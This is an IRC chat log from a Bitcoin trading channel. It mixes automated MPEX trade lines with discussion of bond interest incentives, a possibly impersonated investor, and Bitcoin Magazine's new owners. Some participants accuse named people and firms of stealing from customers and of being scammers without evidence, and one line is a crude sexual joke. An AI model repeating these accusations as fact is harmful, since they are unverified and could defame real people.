06 10:55:56 [MPEX] [S.MPOE] 4510 @ 0.00052718 = 2.3776 BTC [+] Dec 06 10:56:31 [MPEX] [S.MPOE] 3130 @ 0.00052271 = 1.6361 BTC [-] Dec 06 10:56:33 Hmm... I have... an interesting investor in BTC-BOND it seems... Dec 06 11:00:52 [MPEX] [S.MPOE] 12382 @ 0.00052718 = 6.5275 BTC [+] Dec 06 11:00:54 [MPEX] [S.MPOE] 3318 @ 0.00052724 = 1.7494 BTC [+] Dec 06 11:01:01 From the founder of a SEC registered trading platform? Assuming the email is accurate. Dec 06 11:01:36 I would have liked a reply through email to verify that. Dec 06 11:07:07 I just have doubts about that. Dec 06 11:16:39 heh Dec 06 11:20:13 Yeah. Dec 06 11:20:34 [MPEX] [S.MPOE] 17600 @ 0.00052479 = 9.2363 BTC [-] Dec 06 11:20:35 [MPEX] [S.MPOE] 2089 @ 0.00052701 = 1.1009 BTC [+] Dec 06 11:22:41 Odd thing is he registered on Bitcointalk.org after I sent the email out. So he knew the full email and btc address. Although there's also the announcement on the forum and if he provided false information, he could then have seen the announcement and registered another account to PM those info to appear to... But why take so much trouble to appear as some other person? Dec 06 11:22:58 for the lulz Dec 06 11:23:06 Eh Dec 06 11:24:07 Whatever it is, I'm intrigued. Dec 06 11:35:03 It's not that big of a company either, focused on alternative investments and owns a large chunk of BTC-BOND in terms of the average holder but a bit of play money for anyone with larger capital. Dec 06 11:35:32 [MPEX] [S.MPOE] 1191 @ 0.00052271 = 0.6225 BTC [-] Dec 06 11:35:33 [MPEX] [S.MPOE] 21609 @ 0.00052263 = 11.2935 BTC [-] Dec 06 11:35:50 It looks credible. If it's fake information, the user went to great extent to hide his true identity. Dec 06 11:40:06 not like thats particularly hard Dec 06 11:40:51 Hmm, I guess the amount of people suitable is not lacking. Dec 06 11:42:09 mircea_popescu: is there a bot puting those 1000 ask/bids on options? Is that MPEx default price for options? Dec 06 11:47:42 [MPEX] [S.MPOE] 4321 @ 0.00052519 = 2.2693 BTC [+] Dec 06 11:47:42 [MPEX] [S.MPOE] 3879 @ 0.00052521 = 2.0373 BTC [+] Dec 06 11:54:11 [MPEX] [S.MPOE] 21471 @ 0.00052521 = 11.2768 BTC [+] Dec 06 11:54:11 [MPEX] [S.MPOE] 15179 @ 0.00052675 = 7.9955 BTC [+] Dec 06 11:56:47 [MPEX] [S.MPOE] 4321 @ 0.0005233 = 2.2612 BTC [-] Dec 06 11:56:48 [MPEX] [S.MPOE] 14560 @ 0.0005232 = 7.6178 BTC [-] Dec 06 11:56:50 [MPEX] [S.MPOE] 5769 @ 0.00052263 = 3.0151 BTC [-] Dec 06 12:02:07 [MPEX] [S.MPOE] 4321 @ 0.00052672 = 2.276 BTC [+] Dec 06 12:02:08 [MPEX] [S.MPOE] 621 @ 0.00052675 = 0.3271 BTC [+] Dec 06 12:02:09 [MPEX] [S.MPOE] 12158 @ 0.00052701 = 6.4074 BTC [+] Dec 06 12:09:59 [MPEX] [S.MPOE] 4321 @ 0.00052298 = 2.2598 BTC [-] Dec 06 12:10:00 [MPEX] [S.MPOE] 12238 @ 0.00052263 = 6.3959 BTC [-] Dec 06 12:10:01 [MPEX] [S.MPOE] 6491 @ 0.00052218 = 3.3895 BTC [-] Dec 06 12:13:57 Looks like he's sleeping. Dec 06 12:14:16 or away actually Dec 06 12:14:28 looks like its around noon in Europe. Dec 06 12:14:34 oh well Dec 06 12:15:17 [MPEX] [S.MPOE] 4321 @ 0.00052232 = 2.2569 BTC [+] Dec 06 12:15:19 [MPEX] [S.MPOE] 6645 @ 0.00052218 = 3.4699 BTC [-] Dec 06 12:15:20 [MPEX] [S.MPOE] 8300 @ 0.00052122 = 4.3261 BTC [-] Dec 06 12:15:21 [MPEX] [S.MPOE] 8306 @ 0.00052095 = 4.327 BTC [-] Dec 06 12:31:17 [MPEX] [S.MPOE] 4300 @ 0.00052263 = 2.2473 BTC [+] Dec 06 12:31:19 [MPEX] [S.MPOE] 3000 @ 0.00052095 = 1.5629 BTC [-] Dec 06 12:55:09 dd if=/dev/urandom bs=1 count=10 2>/dev/null | base64 -w 0 | rev | cut -b 2- | rev Dec 06 12:55:21 wrong window Dec 06 12:58:54 [MPEX] [S.MPOE] 7994 @ 0.00052095 = 4.1645 BTC [-] Dec 06 12:58:55 [MPEX] [S.MPOE] 8806 @ 0.0005202 = 4.5809 BTC [-] Dec 06 13:10:58 [MPEX] [S.MPOE] 4321 @ 0.00052674 = 2.276 BTC [+] Dec 06 13:11:00 [MPEX] [S.MPOE] 15779 @ 0.00052701 = 8.3157 BTC [+] Dec 06 13:15:01 [MPEX] [S.MPOE] 4321 @ 0.00052535 = 2.27 BTC [-] Dec 06 13:15:03 [MPEX] [S.MPOE] 10050 @ 0.00052532 = 5.2795 BTC [-] Dec 06 13:15:04 [MPEX] [S.MPOE] 10479 @ 0.0005202 = 5.4512 BTC [-] Dec 06 13:21:02 [MPEX] [S.MPOE] 1905 @ 0.0005202 = 0.991 BTC [-] Dec 06 13:21:04 [MPEX] [S.MPOE] 20900 @ 0.00051984 = 10.8647 BTC [-] Dec 06 13:21:05 [MPEX] [S.MPOE] 3225 @ 0.00051871 = 1.6728 BTC [-] Dec 06 13:26:33 [MPEX] [S.MPOE] 725 @ 0.00051871 = 0.3761 BTC [-] Dec 06 13:26:34 [MPEX] [S.MPOE] 20400 @ 0.00051835 = 10.5743 BTC [-] Dec 06 13:26:36 [MPEX] [S.MPOE] 532 @ 0.00051724 = 0.2752 BTC [-] Dec 06 13:31:31 [MPEX] [S.DICE] 934 @ 0.0033361 = 3.1159 BTC [+] Dec 06 13:31:32 [MPEX] [S.DICE] 3566 @ 0.00327384 = 11.6745 BTC [-] Dec 06 13:44:19 [MPEX] [S.MPOE] 15168 @ 0.00051724 = 7.8455 BTC [-] Dec 06 13:44:20 [MPEX] [S.MPOE] 13500 @ 0.00051701 = 6.9796 BTC [-] Dec 06 13:44:22 [MPEX] [S.MPOE] 12500 @ 0.00051669 = 6.4586 BTC [-] Dec 06 13:44:23 [MPEX] [S.MPOE] 11232 @ 0.00051596 = 5.7953 BTC [-] Dec 06 13:45:49 [MPEX] [S.MPOE] 450 @ 0.00051751 = 0.2329 BTC [+] Dec 06 13:47:22 [MPEX] [S.MPOE] 1668 @ 0.00051596 = 0.8606 BTC [-] Dec 06 13:47:22 [MPEX] [S.MPOE] 13682 @ 0.00051484 = 7.044 BTC [-] Dec 06 13:51:11 [MPEX] [S.MPOE] 7134 @ 0.00051484 = 3.6729 BTC [-] Dec 06 13:51:13 [MPEX] [S.MPOE] 197 @ 0.0005133 = 0.1011 BTC [-] Dec 06 13:54:35 [MPEX] [S.MPOE] 9624 @ 0.0005133 = 4.94 BTC [-] Dec 06 13:58:44 [MPEX] [S.MPOE] 20029 @ 0.0005133 = 10.2809 BTC [-] Dec 06 13:58:45 [MPEX] [S.MPOE] 5139 @ 0.00051278 = 2.6352 BTC [-] Dec 06 13:58:47 [MPEX] [S.MPOE] 8750 @ 0.00051164 = 4.4769 BTC [-] Dec 06 13:58:48 [MPEX] [S.MPOE] 1778 @ 0.00050978 = 0.9064 BTC [-] Dec 06 14:13:39 [MPEX] [S.DICE] 481 @ 0.00327384 = 1.5747 BTC [-] Dec 06 14:13:40 [MPEX] [S.DICE] 1024 @ 0.00325533 = 3.3335 BTC [-] Dec 06 14:13:41 [MPEX] [S.DICE] 1404 @ 0.00324728 = 4.5592 BTC [-] Dec 06 14:17:49 [MPEX] [S.MPOE] 7291 @ 0.00051536 = 3.7575 BTC [+] Dec 06 14:17:50 [MPEX] [S.MPOE] 9822 @ 0.00050978 = 5.0071 BTC [-] Dec 06 14:17:51 [MPEX] [S.MPOE] 2150 @ 0.00050899 = 1.0943 BTC [-] Dec 06 14:17:53 [MPEX] [S.MPOE] 3970 @ 0.00050861 = 2.0192 BTC [-] Dec 06 14:17:54 [MPEX] [S.MPOE] 4817 @ 0.00050841 = 2.449 BTC [-] Dec 06 14:29:16 [MPEX] [S.MPOE] 10350 @ 0.00050841 = 5.262 BTC [-] Dec 06 14:29:17 [MPEX] [S.MPOE] 4465 @ 0.00050725 = 2.2649 BTC [-] Dec 06 14:29:19 [MPEX] [S.MPOE] 9835 @ 0.00050718 = 4.9881 BTC [-] Dec 06 14:37:34 [MPEX] [S.MPOE] 14464 @ 0.00051249 = 7.4127 BTC [+] Dec 06 14:49:58 [MPEX] [S.DICE] 627 @ 0.0033435 = 2.0964 BTC [+] Dec 06 14:50:00 [MPEX] [S.DICE] 873 @ 0.0033437 = 2.9191 BTC [+] Dec 06 14:56:36 [MPEX] [S.MPOE] 686 @ 0.00051605 = 0.354 BTC [+] Dec 06 14:56:37 [MPEX] [S.MPOE] 12000 @ 0.0005082 = 6.0984 BTC [-] Dec 06 14:56:39 [MPEX] [S.MPOE] 3161 @ 0.00050718 = 1.6032 BTC [-] Dec 06 15:01:06 [MPEX] [S.MPOE] 2004 @ 0.00050718 = 1.0164 BTC [-] Dec 06 15:01:08 [MPEX] [S.MPOE] 6096 @ 0.00050708 = 3.0912 BTC [-] Dec 06 15:01:56 [MPEX] [S.DICE] 40 @ 0.0033437 = 0.1337 BTC [+] Dec 06 15:01:58 [MPEX] [S.DICE] 1700 @ 0.00334569 = 5.6877 BTC [+] Dec 06 15:12:20 [MPEX] [S.MPOE] 21200 @ 0.00051022 = 10.8167 BTC [+] Dec 06 15:12:21 [MPEX] [S.MPOE] 8815 @ 0.00050708 = 4.4699 BTC [-] Dec 06 15:14:53 [MPEX] [S.MPOE] 8800 @ 0.00051751 = 4.5541 BTC [+] Dec 06 15:14:53 [MPEX] [S.MPOE] 5000 @ 0.00052054 = 2.6027 BTC [+] Dec 06 15:14:55 [MPEX] [S.MPOE] 4500 @ 0.00052701 = 2.3715 BTC [+] Dec 06 15:18:10 [MPEX] [S.MPOE] 4321 @ 0.00052685 = 2.2765 BTC [-] Dec 06 15:18:11 [MPEX] [S.MPOE] 3478 @ 0.00052701 = 1.8329 BTC [+] Dec 06 15:18:13 [MPEX] [S.MPOE] 13569 @ 0.00052724 = 7.1541 BTC [+] Dec 06 15:27:09 [MPEX] [S.DICE] 1750 @ 0.00335574 = 5.8725 BTC [+] Dec 06 15:31:00 [MPEX] [S.MPOE] 7600 @ 0.00050745 = 3.8566 BTC [-] Dec 06 15:31:01 [MPEX] [S.MPOE] 4321 @ 0.00050718 = 2.1915 BTC [-] Dec 06 15:31:02 [MPEX] [S.MPOE] 4691 @ 0.00050708 = 2.3787 BTC [-] Dec 06 16:28:18 [MPEX] [S.MPOE] 4321 @ 0.00052498 = 2.2684 BTC [+] Dec 06 16:28:20 [MPEX] [S.MPOE] 5703 @ 0.00052473 = 2.9925 BTC [-] Dec 06 16:28:21 [MPEX] [S.MPOE] 2350 @ 0.00052243 = 1.2277 BTC [-] Dec 06 16:28:22 [MPEX] [S.MPOE] 1826 @ 0.00052111 = 0.9515 BTC [-] Dec 06 16:39:00 [MPEX] [S.MPOE] 15974 @ 0.00052111 = 8.3242 BTC [-] Dec 06 16:39:01 [MPEX] [S.MPOE] 4100 @ 0.00052069 = 2.1348 BTC [-] Dec 06 16:39:03 [MPEX] [S.MPOE] 20226 @ 0.0005181 = 10.4791 BTC [-] Dec 06 16:55:17 [MPEX] [S.MPOE] 4321 @ 0.00052194 = 2.2553 BTC [+] Dec 06 16:55:19 [MPEX] [S.MPOE] 26541 @ 0.00052197 = 13.8536 BTC [+] Dec 06 16:55:20 [MPEX] [S.MPOE] 6938 @ 0.0005271 = 3.657 BTC [+] Dec 06 17:09:17 [MPEX] [S.MPOE] 4321 @ 0.00051835 = 2.2398 BTC [-] Dec 06 17:09:19 [MPEX] [S.MPOE] 479 @ 0.0005181 = 0.2482 BTC [-] Dec 06 17:14:23 [MPEX] [S.MPOE] 4321 @ 0.00052146 = 2.2532 BTC [+] Dec 06 17:14:23 [MPEX] [S.MPOE] 20700 @ 0.00052147 = 10.7944 BTC [+] Dec 06 17:20:57 [MPEX] [S.MPOE] 2650 @ 0.00052384 = 1.3882 BTC [+] Dec 06 17:21:53 [MPEX] [S.MPOE] 2129 @ 0.00052384 = 1.1153 BTC [+] Dec 06 17:21:55 [MPEX] [S.MPOE] 252 @ 0.0005181 = 0.1306 BTC [-] Dec 06 17:21:55 [MPEX] [S.MPOE] 23300 @ 0.00051778 = 12.0643 BTC [-] Dec 06 17:21:56 [MPEX] [S.MPOE] 5300 @ 0.00051742 = 2.7423 BTC [-] Dec 06 17:21:57 [MPEX] [S.MPOE] 18010 @ 0.00051555 = 9.2851 BTC [-] Dec 06 17:35:28 [MPEX] [S.MPOE] 4321 @ 0.0005158 = 2.2288 BTC [+] Dec 06 17:35:29 [MPEX] [S.MPOE] 11872 @ 0.00051555 = 6.1206 BTC [-] Dec 06 17:44:21 [MPEX] [S.MPOE] 4321 @ 0.00052706 = 2.2774 BTC [+] Dec 06 17:44:23 [MPEX] [S.MPOE] 4890 @ 0.0005271 = 2.5775 BTC [+] Dec 06 17:44:24 [MPEX] [S.MPOE] 37782 @ 0.00052724 = 19.9202 BTC [+] Dec 06 17:44:25 [MPEX] [S.MPOE] 12207 @ 0.00052725 = 6.4361 BTC [+] Dec 06 17:54:00 [MPEX] [S.MPOE] 1300 @ 0.00052579 = 0.6835 BTC [-] Dec 06 17:55:23 Blue Horseshoe loves Anacott Steel. Dec 06 17:57:13 [MPEX] [S.MPOE] 4321 @ 0.00052702 = 2.2773 BTC [+] Dec 06 17:57:14 [MPEX] [S.MPOE] 11043 @ 0.00052725 = 5.8224 BTC [+] Dec 06 17:57:15 [MPEX] [S.MPOE] 10389 @ 0.00052728 = 5.4779 BTC [+] Dec 06 18:03:10 [MPEX] [S.MPOE] 4321 @ 0.00052709 = 2.2776 BTC [-] Dec 06 18:03:12 [MPEX] [S.MPOE] 11657 @ 0.00052728 = 6.1465 BTC [+] Dec 06 18:03:13 [MPEX] [S.MPOE] 2022 @ 0.00052737 = 1.0663 BTC [+] Dec 06 18:07:27 [MPEX] [S.MPOE] 3278 @ 0.00052737 = 1.7287 BTC [+] Dec 06 18:07:28 [MPEX] [S.MPOE] 4122 @ 0.0005275 = 2.1744 BTC [+] Dec 06 18:25:52 [MPEX] [S.MPOE] 3021 @ 0.00052579 = 1.5884 BTC [-] Dec 06 18:25:54 [MPEX] [S.MPOE] 13504 @ 0.00052575 = 7.0997 BTC [-] Dec 06 18:32:20 [MPEX] [S.MPOE] 3700 @ 0.00052588 = 1.9458 BTC [+] Dec 06 18:33:14 [MPEX] [S.MPOE] 4321 @ 0.00052725 = 2.2782 BTC [+] Dec 06 18:33:15 [MPEX] [S.MPOE] 22178 @ 0.0005275 = 11.6989 BTC [+] Dec 06 18:33:17 [MPEX] [S.MPOE] 5501 @ 0.00052775 = 2.9032 BTC [+] Dec 06 18:36:01 [MPEX] [S.MPOE] 621 @ 0.00052588 = 0.3266 BTC [-] Dec 06 18:36:02 [MPEX] [S.MPOE] 10479 @ 0.00052575 = 5.5093 BTC [-] Dec 06 18:41:47 [MPEX] [S.MPOE] 4321 @ 0.00052743 = 2.279 BTC [+] Dec 06 18:41:48 [MPEX] [S.MPOE] 10753 @ 0.00052775 = 5.6749 BTC [+] Dec 06 18:45:01 [MPEX] [S.MPOE] 4296 @ 0.00052775 = 2.2672 BTC [+] Dec 06 18:45:02 [MPEX] [S.MPOE] 17295 @ 0.00052793 = 9.1305 BTC [+] Dec 06 18:45:04 [MPEX] [S.MPOE] 9809 @ 0.00052841 = 5.1832 BTC [+] Dec 06 18:48:35 [MPEX] [S.MPOE] 4321 @ 0.00052588 = 2.2723 BTC [-] Dec 06 18:48:36 [MPEX] [S.MPOE] 5217 @ 0.00052575 = 2.7428 BTC [-] Dec 06 18:48:38 [MPEX] [S.MPOE] 11662 @ 0.00052537 = 6.1269 BTC [-] Dec 06 18:50:39 http://jcph.am/2012/12/06/two-track-thursdays/ Dec 06 18:50:41 [MPEX] [S.MPOE] 4321 @ 0.00052835 = 2.283 BTC [+] Dec 06 18:54:21 http://www.net-security.org/malware_news.php?id=2344 so much for sms double factor authentication Dec 06 18:56:58 [MPEX] [S.MPOE] 16325 @ 0.0005284 = 8.6261 BTC [+] Dec 06 18:57:00 [MPEX] [S.MPOE] 8850 @ 0.00052557 = 4.6513 BTC [-] Dec 06 18:57:01 [MPEX] [S.MPOE] 4325 @ 0.00052537 = 2.2722 BTC [-] Dec 06 19:02:07 [MPEX] [S.MPOE] 2091 @ 0.00052841 = 1.1049 BTC [+] Dec 06 19:02:09 [MPEX] [S.MPOE] 9609 @ 0.00052848 = 5.0782 BTC [+] Dec 06 19:04:30 [MPEX] [S.MPOE] 10991 @ 0.00052848 = 5.8085 BTC [+] Dec 06 19:04:30 [MPEX] [S.MPOE] 3509 @ 0.00052848 = 1.8544 BTC [+] Dec 06 19:07:52 [MPEX] [S.MPOE] 16812 @ 0.00052848 = 8.8848 BTC [+] Dec 06 19:07:53 [MPEX] [S.MPOE] 19050 @ 0.00052859 = 10.0696 BTC [+] Dec 06 19:07:54 [MPEX] [S.MPOE] 5350 @ 0.00052877 = 2.8289 BTC [+] Dec 06 19:07:55 [MPEX] [S.MPOE] 27488 @ 0.00052903 = 14.542 BTC [+] Dec 06 19:10:18 [MPEX] [S.MPOE] 4321 @ 0.0005257 = 2.2715 BTC [-] Dec 06 19:10:19 [MPEX] [S.MPOE] 4321 @ 0.00052554 = 2.2709 BTC [-] Dec 06 19:10:20 [MPEX] [S.MPOE] 5958 @ 0.00052537 = 3.1302 BTC [-] Dec 06 19:19:32 [MPEX] [S.MPOE] 4321 @ 0.00052567 = 2.2714 BTC [+] Dec 06 19:19:33 [MPEX] [S.MPOE] 4555 @ 0.00052537 = 2.3931 BTC [-] Dec 06 19:19:35 [MPEX] [S.MPOE] 7091 @ 0.00052268 = 3.7063 BTC [-] Dec 06 19:19:36 [MPEX] [S.MPOE] 4933 @ 0.00051758 = 2.5532 BTC [-] Dec 06 19:22:47 [MPEX] [S.MPOE] 4417 @ 0.00051758 = 2.2862 BTC [-] Dec 06 19:22:49 [MPEX] [S.MPOE] 5533 @ 0.00051555 = 2.8525 BTC [-] Dec 06 19:30:29 so i just received a pair of those bitcoin cufflinks Dec 06 19:30:31 pretty cool Dec 06 19:30:59 ;;later tell namjies ofcourse there's a bot putting in the 1ks. that's mpoe. Dec 06 19:30:59 The operation succeeded. Dec 06 19:32:16 who had the cufflinks again? Dec 06 19:32:25 i remember those but forgot about them Dec 06 19:37:19 [MPEX] [S.MPOE] 4321 @ 0.00052744 = 2.2791 BTC [+] Dec 06 19:37:21 [MPEX] [S.MPOE] 20079 @ 0.00052779 = 10.5975 BTC [+] Dec 06 19:38:46 some guy on forum, 1 sec Dec 06 19:39:28 yeah it was a forum thread Dec 06 19:39:29 that's right Dec 06 19:41:40 https://bitcointalk.org/index.php?topic=120686.0 Dec 06 19:41:56 isokivi guy Dec 06 19:45:13 [MPEX] [S.MPOE] 4321 @ 0.00051834 = 2.2397 BTC [-] Dec 06 19:45:15 [MPEX] [S.MPOE] 15672 @ 0.00051811 = 8.1198 BTC [-] Dec 06 19:45:15 [MPEX] [S.MPOE] 25107 @ 0.00051651 = 12.968 BTC [-] Dec 06 19:49:23 [MPEX] [S.MPOE] 12500 @ 0.00051651 = 6.4564 BTC [-] Dec 06 19:51:11 17:31 < mircea_popescu> ;;later tell namjies ofcourse there's a bot putting in the 1ks. that's mpoe. <<< lolwut? Dec 06 19:52:26 i dunno ? Dec 06 19:53:03 heh, what caused you to make that statement Dec 06 19:54:15 i dont have anything to put that cufflink on Dec 06 19:54:28 you all srs bsns Dec 06 19:54:38 kakobreklaaa: cut a hole in the sleeve of your t-shirt Dec 06 19:54:57 no need to cut Dec 06 19:55:05 oh, right Dec 06 19:55:14 its old just rip if its not already there! Dec 06 19:55:56 i like my clothes old and worn Dec 06 19:56:05 even in public Dec 06 19:58:06 smickles namjies was asking if it's mpoe that puts the 1k bids on options Dec 06 19:58:09 well... it is Dec 06 20:00:10 ya know, come to think of it, it's not that directly obvious, is is? Dec 06 20:00:14 mircea_popescu did you get some physical from the guy whos name is unspellable? Dec 06 20:00:15 er, is it Dec 06 20:00:42 argh words missing Dec 06 20:00:48 kakobreklaaa: Mike Caldwell is unspellable? Dec 06 20:00:56 physical coins* Dec 06 20:01:14 well no, but cas-something-something is Dec 06 20:01:25 hehe casascius? Dec 06 20:01:27 smickles i dunno, i thought it was Dec 06 20:01:30 and no afaik kakobreklaaa Dec 06 20:01:42 afaik? you dont know if you got em? Dec 06 20:01:46 thats silly. Dec 06 20:03:08 [MPEX] [S.MPOE] 4321 @ 0.00052776 = 2.2805 BTC [+] Dec 06 20:03:10 [MPEX] [S.MPOE] 33188 @ 0.00052779 = 17.5163 BTC [+] Dec 06 20:03:39 mircea_popescu: http://dubjoy.com/happy Dec 06 20:03:42 i never got any! Dec 06 20:03:48 i'm ADHD so that may not apply Dec 06 20:04:07 basically jengix's conference vidoe Dec 06 20:04:16 the original source coul've been subbed freely Dec 06 20:04:54 oh nevermind it isn't free Dec 06 20:06:07 uh Dec 06 20:07:08 "PSPs are allowed to hold fiat currency on behalf of third-parties and offer payment services, it's exactly what a bank does, minus the issuing of credit." Dec 06 20:07:11 davout is cute. Dec 06 20:07:20 my cock is exactly like a cunt minus the bleeding thing Dec 06 20:13:22 wat Dec 06 20:22:16 ;;rate Isokivi 1 Bitcoin cufflinks! Dec 06 20:22:17 Rating entry successful. Your rating of 1 for user Isokivi has been recorded. Dec 06 20:30:55 mircea_popescu, https://bitcointalk.org/index.php?topic=64962.msg1382629#msg1382629 ? Dec 06 20:31:56 im not sure i get the question. Dec 06 20:32:38 all bondholders get the part of loss based on their investment, right? Dec 06 20:32:42 in mpoe Dec 06 20:33:10 then, they have no incentive to lower the requested interest Dec 06 20:33:34 [MPEX] [S.MPOE] 4321 @ 0.00052881 = 2.285 BTC [+] Dec 06 20:33:36 [MPEX] [S.MPOE] 22029 @ 0.00052903 = 11.654 BTC [+] Dec 06 20:34:53 [MPEX] [S.MPOE] 4321 @ 0.00052901 = 2.2859 BTC [-] Dec 06 20:34:55 [MPEX] [S.MPOE] 6319 @ 0.00052903 = 3.3429 BTC [+] Dec 06 20:38:37 jurov yes Dec 06 20:38:47 their incentive is that if someone asks for less that someone gets paid and they get nothing. Dec 06 20:40:49 [MPEX] [S.DICE] 1403 @ 0.00335574 = 4.7081 BTC [+] Dec 06 20:40:50 [MPEX] [S.DICE] 3000 @ 0.00334751 = 10.0425 BTC [-] Dec 06 20:43:55 while potential reward is depending on requested interest, the risk is not. so it makes sense to maximize potential reward Dec 06 20:44:19 [MPEX] [S.MPOE] 4321 @ 0.00052812 = 2.282 BTC [-] Dec 06 20:44:21 [MPEX] [S.MPOE] 11929 @ 0.00052793 = 6.2977 BTC [-] Dec 06 20:44:29 i don't think your modelling is correct. Dec 06 20:44:41 potential reward is = to the highest interest someone asks, for everybody. Dec 06 20:44:51 risk is = to the interest the person himself asks. Dec 06 20:44:51 plus the demand for bonds is consistently higher than supply, this is the catch Dec 06 20:45:10 so the actual self-interest is to ask for 0% and hope someone else asks for 100% or w/e Dec 06 20:45:27 the demand is actually consistently less than the suppluy. Dec 06 20:45:41 november was the first time in like half a year that the demand overstripped supply.\ Dec 06 20:46:01 [MPEX] [S.MPOE] 4321 @ 0.00052812 = 2.282 BTC [+] Dec 06 20:46:02 [MPEX] [S.MPOE] 13479 @ 0.00052793 = 7.116 BTC [-] Dec 06 20:46:23 on a side note, i had a surge of new bitcoin forex accounts and 90% of the people never used bitcoin before Dec 06 20:46:30 i see it as a gamble, you either receive the interest, or lose exactly the same part as other players Dec 06 20:46:32 pretty cool. Dec 06 20:46:41 that didn't make sense jurov Dec 06 20:50:18 well it's true it needs more exact research... i'll maybe put it into spreadsheet over historical data what would happen if i had lowest vs. highest bond rate Dec 06 20:51:16 it's pretty simple tho : if you had 0% rate you would always be included, and receive whatever's paid, 4%, 9%, 9.9% etcv Dec 06 20:51:28 if you asked for 9.9% you'd be included in november but not in august, sept oct etc Dec 06 20:51:40 thus you effectively make 9.9/4 = 2.4x% per month Dec 06 20:51:55 this mathematically converges to the actual true rate. Dec 06 20:55:10 hum https://bitcointalk.org/index.php?topic=129461.0 Dec 06 20:56:25 ya i was saying earlier. Dec 06 20:56:28 good for him tho. Dec 06 20:56:42 what were you sayin about it Dec 06 20:59:06 " davout is cute." Dec 06 20:59:24 a. Dec 06 20:59:26 :) Dec 06 21:10:28 [MPEX] [S.MPOE] 4321 @ 0.00052898 = 2.2857 BTC [+] Dec 06 21:10:30 [MPEX] [S.MPOE] 6497 @ 0.00052903 = 3.4371 BTC [+] Dec 06 21:10:31 [MPEX] [S.MPOE] 6132 @ 0.00052922 = 3.2452 BTC [+] Dec 06 21:14:54 [MPEX] [S.MPOE] 4321 @ 0.0005292 = 2.2867 BTC [-] Dec 06 21:14:55 [MPEX] [S.MPOE] 979 @ 0.00052922 = 0.5181 BTC [+] Dec 06 21:20:00 o looky https://bitcointalk.org/index.php?topic=129454.0 Dec 06 21:20:16 Coin Publishing LLC is collectively owned by individuals owning or working at BitPay, Butterfly Labs, Google, Casascius, 20 Mission, and Virtual Processing Solutions. Dec 06 21:22:52 yeah, the more people mix into it, the better Dec 06 21:24:15 dunno, id rather see bfl keeps its shit for themselfs, with the rest im not bothered Dec 06 21:24:34 and 20 missions? Dec 06 21:24:37 is that vps giga's thing ? Dec 06 21:24:38 isnt that in default or smth Dec 06 21:24:44 ya Dec 06 21:24:58 is Coin Publishing LLC a MNW umbrella organization? Dec 06 21:25:05 and is Dr. Evil a charter member? Dec 06 21:25:17 lol Dec 06 21:29:23 [MPEX] [S.MPOE] 4321 @ 0.0005281 = 2.2819 BTC [-] Dec 06 21:29:25 [MPEX] [S.MPOE] 19879 @ 0.00052793 = 10.4947 BTC [-] Dec 06 21:32:17 [MPEX] [S.MPOE] 4321 @ 0.00052804 = 2.2817 BTC [+] Dec 06 21:32:18 [MPEX] [S.MPOE] 6329 @ 0.00052793 = 3.3413 BTC [-] Dec 06 21:33:16 [MPEX] [S.MPOE] 1075 @ 0.00052793 = 0.5675 BTC [-] Dec 06 21:33:18 [MPEX] [S.MPOE] 29925 @ 0.0005248 = 15.7046 BTC [-] Dec 06 21:37:22 [MPEX] [S.MPOE] 4321 @ 0.00052504 = 2.2687 BTC [+] Dec 06 21:37:24 [MPEX] [S.MPOE] 14930 @ 0.0005248 = 7.8353 BTC [-] Dec 06 21:37:24 [MPEX] [S.MPOE] 2149 @ 0.00052193 = 1.1216 BTC [-] Dec 06 21:45:17 forums getting dawsed again? Dec 06 21:45:30 deedaaaws Dec 06 22:00:58 [MPEX] [S.MPOE] 10500 @ 0.00052232 = 5.4844 BTC [+] Dec 06 22:01:00 [MPEX] [S.MPOE] 15300 @ 0.00052193 = 7.9855 BTC [-] Dec 06 22:11:39 giga bought into bitcoin magazine? Dec 06 22:11:43 dude is losing the plot Dec 06 22:12:57 hum? Dec 06 22:13:03 http://bitcoinmagazine.net/bitcoin-magazine-has-new-ownership/ Dec 06 22:13:05 you are bothered by him? Dec 06 22:13:19 Coin Publishing LLC is collectively owned by individuals owning or working at BitPay, Butterfly Labs, Google, Casascius, 20 Mission, and Virtual Processing Solutions. Dec 06 22:13:26 yeah i pasted same earlier Dec 06 22:13:39 bfl is the one that is bothering me Dec 06 22:14:02 kakobrekla: in that list he is the only dissapointment Dec 06 22:14:25 as in, he wasn't previously in my assclown list Dec 06 22:14:34 [MPEX] [S.MPOE] 4321 @ 0.00052832 = 2.2829 BTC [+] Dec 06 22:14:35 [MPEX] [S.MPOE] 11779 @ 0.00052843 = 6.2244 BTC [+] Dec 06 22:14:46 isn't 20 mission the thing tradehill people (mckenna et co) made with the money they stole off customers ? Dec 06 22:14:52 o, yes it is. Dec 06 22:14:54 nasty. Dec 06 22:14:54 yeah 20 sacmmers Dec 06 22:15:01 scammers* Dec 06 22:15:11 20:24.15 ( kakobreklaaa ) dunno, id rather see bfl keeps its shit for themselfs, with the rest im not bothered Dec 06 22:15:11 20:24.34 ( kakobreklaaa ) and 20 missions? Dec 06 22:15:11 20:24.39 ( mircea_popescu ) is that vps giga's thing ? Dec 06 22:15:11 20:24.39 ( kakobreklaaa ) isnt that in default or smth Dec 06 22:15:11 20:24.45 ( kakobreklaaa ) ya Dec 06 22:15:21 buttpay is vorhees Dec 06 22:15:28 bfl, derp Dec 06 22:15:29 i thought it was shrem Dec 06 22:15:45 google is clearly the great satan Dec 06 22:15:56 casascius is a moron apologist Dec 06 22:16:04 so they sold a share to a janitor at google Dec 06 22:16:05 big deal Dec 06 22:16:34 yeah thats a funny inclusion Dec 06 22:16:50 'google was involved in this deal' Dec 06 22:17:14 gigavps: please tell us that your janitor invested not gigacorp Dec 06 22:18:37 [MPEX] [S.MPOE] 4321 @ 0.00052199 = 2.2555 BTC [-] Dec 06 22:18:39 [MPEX] [S.MPOE] 4349 @ 0.00052193 = 2.2699 BTC [-] Dec 06 22:18:40 [MPEX] [S.MPOE] 23098 @ 0.00052057 = 12.0241 BTC [-] Dec 06 22:18:50 so anyone know if vlad and the resit of the cryptoanarchy in the UK set are still involved? Dec 06 22:19:19 vlad is not Dec 06 22:20:27 in that case it might be for the best Dec 06 22:21:11 if I see another guy fawkes mask on that shit im going to be evben butthurter Dec 06 22:26:29 anyone hold any shares of Cognative ? Dec 06 22:31:19 [MPEX] [S.MPOE] 9553 @ 0.00052057 = 4.973 BTC [-] Dec 06 22:31:21 [MPEX] [S.MPOE] 5247 @ 0.00052025 = 2.7298 BTC [-] Dec 06 22:34:11 [MPEX] [S.MPOE] 10853 @ 0.00052025 = 5.6463 BTC [-] Dec 06 22:34:12 [MPEX] [S.MPOE] 16264 